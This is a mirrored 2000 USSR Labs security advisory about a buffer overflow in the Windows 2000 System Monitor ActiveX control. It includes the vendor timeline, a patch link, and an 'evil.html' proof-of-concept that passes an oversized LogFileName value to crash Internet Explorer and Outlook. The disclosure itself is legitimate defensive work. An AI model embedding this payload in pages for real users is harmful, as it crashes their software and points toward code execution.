Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:891
HistoryNov 08, 2000 - 12:00 a.m.

System Monitor ActiveX Buffer Overflow Vulnerability

2000-11-0800:00:00
vulners.com
8

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

System Monitor ActiveX Buffer Overflow Vulnerability

USSR Advisory Code: USSR-2000057

Public Disclosure Date:
November 3, 2000

Vendors Affected:

Microsoft Corporation
http://www.microsoft.com

Systems Affected:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server

Problem:
The USSR Team has found a problem in the Microsoft System Monitor
ActiveX control (class id: C4D2D8E0-D1DD-11CE-940F-008029004347,
sysmon.ocx)
in the Value field name "LogFileName",which could be used by
malicious user
to potentially run code on another user’s machine.

The vulnerability can only be exploited if ActiveX controls are
enabled in Internet Explorer, Outlook or Outlook Express.

SPECIAL NOTE: USSR Labs takes no responsibility for the following
example.
It is provided for educational purposes only.

Example evil.html:

<HTML>
<BODY>
<OBJECT ID="DISystemMonitor1" WIDTH="100%" HEIGHT="100%"
CLASSID="CLSID:C4D2D8E0-D1DD-11CE-940F-008029004347">
<PARAM NAME="LogFileName" VALUE="aaaaaaaaaa[20000 'a']"
</OBJECT>
</BODY>
</HTML>

If a user accesses a page with the above mentioned code imbedded,
IE, Outlook and Outlook Express will crash. The following error
message will appear in the event log.

"Application popup: iexplore.exe - Application Error : The
instruction at "0x64a8e132" referenced memory at "0x006100dd". The
memory could not be "written".

Online examples:

http://www.ussrback.com/microsoft/msmactivex.html
http://www.ussrback.com/microsoft/msmactivex2.html

Vendor Status:
Informed: Sunday, September 17, 2000 4:23 PM
Contacted: Sunday, September 17, 2000 5:55 PM
Patch Available: November 3, 2000

Status:

More Information:

http://www.microsoft.com/technet/security/bulletin/ms00-085.asp

Frequently Asked Questions: Microsoft Security Bulletin MS00-085
http://www.microsoft.com/technet/security/bulletin/fq00-085.asp

Microsoft Knowledge Base article Q278511 discusses this issue and
will be available soon.

Fix:
Windows 2000: (can be applied to both Gold and Service Pack 1)

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25532

Related Links:

Underground Security Systems Research:
http://www.ussrback.com

CrunchSp Product:
http://www.crunchsp.com

About:

USSR is an emerging security company based in South America.
We are devoted to network security research, vulnerability research,
and software protection systems. One of the main objectives of USSR
is to
develop and implement cutting edge security and protection systems
that cater to an evolving market.

We believe that the way we implement security solutions can make a
difference. CrunchSP is an example, providing a solution to software
piracy.
Our solutions such as CrunchSP are devoted to protecting your
enterprise.

On a daily basis, we research, develop, discover and report
vulnerability information. We make this information freely available
via
public forums such as BugTraq, and our advisory board located at
http://www.ussrback.com.

The USSR is a highly skilled, experienced team. Many USSR
programmers, as well as programmers of partners and affiliates, are
seasoned
professionals, with 12 or more years of industry experience. A
knowledge
base of numerous computer applications as well as many high and low
level
programming languages makes USSRback a diverse team of experts
prepared to
serve the needs of any customer.

USSR has assembled some of the world's greatest software developers
and security consultants to provide our customers with a wide range
of enterprise level services. These services include:

  • Network Penetration Testing
  • Security Application development
  • Application Security Testing and Certification
  • Security Implementations
  • Cryptography
  • Emergency Response Team
  • Firewalling
  • Virtual Private Networking
  • Intrusion Detection
  • Support and maintenance

For more information, please contact us via email at
[email protected].

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without explicit
consent of USSR. If you wish to reprint whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
[email protected] for permission.

Disclaimer:
The information within this paper may change without notice. We may
not be held responsible for the use and/or potential effects of these
programs or advisories. Use them and read them at your own risk or
not at all. You solely are responsible for this judgment.

Feedback:

If you have any questions, comments, concerns, updates, or
suggestions please feel free to send them to:

Underground Security Systems Research
mail:[email protected]
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBOgaIm9ybEYfHhkiVEQL9AACfZbM84UMWwahAJaao9LDtxKFqxPgAoIU/
YvT1lzjOJq9abeVZcdiJlrnN
=Gs3p
-----END PGP SIGNATURE-----